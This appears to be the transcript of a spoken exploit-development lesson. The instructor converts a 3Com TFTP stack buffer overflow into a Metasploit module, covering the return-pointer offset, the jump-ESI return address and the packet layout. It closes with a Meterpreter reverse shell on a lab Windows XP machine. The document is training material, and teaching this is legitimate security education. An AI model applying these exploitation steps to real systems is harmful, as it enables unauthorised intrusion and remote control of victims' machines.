Okay, now let's try and turn our 3Com exploit into a Metasploit module. I went ahead and finished up the 3Com exploit that you were supposed to do as an exercise. And so we have some shell code, and then we have buff being the shell code at the beginning, and then I padded it with a times 473 minus the length of buff, so 473 is the offset you should have found to our save return pointer overwrite. So we need to make sure that that is 473 bytes total, buff plus some padding. Otherwise, our return address here, which is a jump ESI in Little Endian format, will not be in the correct place. Then I padded it out to 500 with 23 C's. So originally my return address was some B's. So that is our finished exploit there. Very similar to the public exploit, and I wanted you to do that as an exercise earlier in this module. So now I want to see if we can make this into a Metasploit module. So I want to go to user share Metasploit-framework and go into the module tree. So I want to go into modules and Windows and TFTP. There's no TFTP. Oops, I see what I did. Modules exploits, then Windows, then TFTP. Forgot my Windows, or my exploits rather. So those are all the trivial FTP exploits for Windows. There is actually one for this 3Com already, but that would be a little too easy to use as a base. So here's one that's called FutureSoft Transfer Mode. So that should be a good start. So we'll just use that one as a base. So I'll copy FutureSoft Transfer Mode to my exploit.rb. And then we will edit my exploit. So let's see, at the top up here we have a couple include statements. This is a remote UDP exploit. It is not, however, structured exception handler. We'll look at that next. That'll actually be the last thing we see for exploit development before we move on to mobile. So we can get rid of this. No structured exception handler needed here. And then we have information about the module, its name, description, who wrote it, CVE references. So if we were actually writing a module, we would need to change those accordingly, but we don't need to do that here. It kind of just be a waste of time. You're certainly welcome to look up the relevant CVE information for this module and change it accordingly. Default options, and we can just leave that, that's fine. Payload. Alright, so this is important. We do need to give it information about the payload. Metasploit will automatically create the payload, of course. We've seen that plenty of times throughout the class, so we need to tell it the relevant information so it can do that. Space, how much space we have for the payload. It will take up the full amount of space, so it will pad with NOP equivalence if it needs to. So we have 473 bytes. The only bad character we have is a null, so we can leave that as is. Stack adjustment, we don't necessarily need. Most of the modules I see have this in there, so it just seems to be kind of a rule of thumb to put it there. So we'll just leave the stack adjustment in there. We saw a stack adjustment earlier in our WarFTP example. Platform is indeed Windows. Targets, if we were creating a Metasploit module, it would behoove us at least to find as many targets as we could. Make a lot of virtual machines and try it out on different platforms. But we only have one, so we can get rid of the first three. And so we'll just have the one target here, and we'll make it Windows XP, SP3, English, and the return address, we do not need it in Little Endian format, but I have forgotten what it was. So let's go back to desktop and take a look. Recom exploit. So here it is in Little Indian format. Oops. So let's put it in just regular format, and Metasploit will take care of setting it up as Little Indian. So that is our jump ESI. If you chose a different one from your Mona listing, that's perfectly fine. Privilege true, disclosure date, we can just leave those. We should change the disclosure date to whatever it is for our particular exploit. Remote port will be 69, so that's good. So pretty simple there, just giving it basic information about the payload is the main point. Then we have connect UDP. We can print status trying target name. Since we only have one target, that's kind of extraneous, so we can just get rid of that. And then our exploit string, in this case it's going to be pretty different. It looks like, since it does use structured exception handlers, it's a little bit different than what we're used to. We will again see that momentarily when we move on to structured exception handlers to end out this module. But let's see if we can find an example for TFTP that doesn't use structured exception handlers and see if we can use that as a base. So we'll go ahead and save this, and let's see, let's try this TFTPD32 long file name.rb. If we go up to the top and look at the mixins here, it does not have that structured exception handler, so it is going to be a saved return pointer overwrite like we're used to. If we look at its exploit string, looks like it's reading a file instead of writing, and then we should have the file name, so it looks like they're doing a 120 character file name, avoiding the payload bad characters, and they're doing random text English. Anything that is the same every time is something that an intrusion detection system can pick up on, so it's a good practice to use random text and let it change. And then it looks like they're also doing a dot and then 135 characters. Again, this is a different server, it's TFTPD32, so we don't really know anything about this particular vulnerability. And then target.ret, so the return address for the chosen target, packed in Little Indian format. And then payload.encoded right after it, and then a null byte. So it looks like they're not even finishing the entire packet. It looks like they just have a long file name and then they stop, and that's good enough, it seems. Okay, well, again, we don't really know anything about this target, but we can certainly use this as a base for our exploit. So I'll just copy that and then go back to my exploit and come down to my definition of exploit and switch out this exploit string for the one we just copied, and we'll make changes to it, of course. Alright, so we want it to write, so we want 0002 to write, and we used the name Georgia, which is, I should really know how long my own name is, 7 characters, so just to be consistent, we'll tell it we want random text English 7 characters, and we do want to avoid the bad characters. We don't need this dot, but we do need a null to specify the end of the file name. And then we don't need this extra random text here. I'm not sure why they have a 2-part file name with a dot in it, but again, that's a different vulnerability. Let's actually put this all on one line. It looks kind of silly like that. And then we want target.ret.packv, so that should be after our payload, because remember we have payload, then padding, and Metasploit will automatically pad up to the length we tell it, which was that 473 bytes. So we want our payload.encoded first So right after the null at the beginning of the mode, we want payload.encoded. And then we want our target.ret in little Indian format. And then finally we want the null byte. So I guess if we wanted to be a little bit nicer, we could do like split plus equals and break it up into multiple lines so it wouldn't be so long like this and run off the screen. We've got 0002, a file name. So I just did 7 characters because that's what we used in our original one, so we know it works. Then a null byte to end the file name. Then payload right at the beginning of our mode, just like we did in our exploit. So we have the same thing here, 0002, the name Georgia hard-coded in, a null byte, and then buffer, which is shellcode, padding, return address, and then some extra padding at the end, which we dropped off here, but it'll still work. We could put it in as well if we wanted to. So we could do random text of 23 characters. So again, we have the payload at the beginning, and that will pad out to 473, what we put for space, so it will fill all of that space. And then we have target.ret, and it's packed into little Indian format, and then we have a null to finish the packet. And we can leave the rest of it there. It does put in the UDP socket our exploit and sets up the handler. So assuming I haven't made any mistakes, and since I just grabbed this basically from 2 different modules and made a couple of changes, shouldn't expect that there's anything there. I think that's the easiest way to do it. You can certainly start with a base exploit skeleton and fill it in, but I think it's easier and I'm less likely to make mistakes if I just stick with something that's already there and make changes to it. Alright, so let's start up MSF console. And it's probably going to complain that the database isn't running, but that's okay. We can live with that. I'm just going to load up our module tree here. Hopefully it won't take too long. It'll probably take even longer because it's going to try and attach to the database, and I don't think the database is listening. Well, while that's running, let's go ahead and okay, so here we go. Let's see if we got any errors. We did not, so it should have loaded the module just fine. If there was an error, it would have told us as it loaded. So we should be able to use exploit, Windows, TFTP, my exploit. If we show our options, we need to set our host, so that's going to be Windows XP, as usual. And it doesn't have a target set automatically. We could have set a default target. That would probably be a good idea. So if we set target 0, and if we show our payloads, we'll automatically pull up our Metasploit payload system. And let's make sure our TFTP server is actually running. Go to C Windows and open the controller and start. Let's set payload, Windows, Meterpreter, reverse TCP. Set lhost 192.168.1.77. And let's see if it works. Exploit. Got the stage, that's a start. Oh, look, Meterpreter. So, a benefit of using Metasploit, we get the Metasploit payload system. We can share it with others easily. So, that makes it Pretty nice. Alright, so one last thing, if we do want to submit this to Metasploit, so let's just exit and quit. We do want to submit this to the Metasploit repositories, which obviously we don't here, we've just rewritten the module that's already there. But if we do, if we go to, I believe it's in Tools, yes, there's msftidy.rb. If we want to submit this, msftidy will check for like trailing new lines and other errors that aren't going to be syntax errors. MSF console will find that, but it will find like formatting errors because they like everything to be the same. So if you run msftidy against your module, it'll find, like, again, trailing white space and stuff like that that will cause your module to get bounced back for silly reasons, really. So if you just run msftidy against it, you can clean that stuff up before you submit it. But again, we're not going to submit anything here. We need, of course, something new in order to be useful.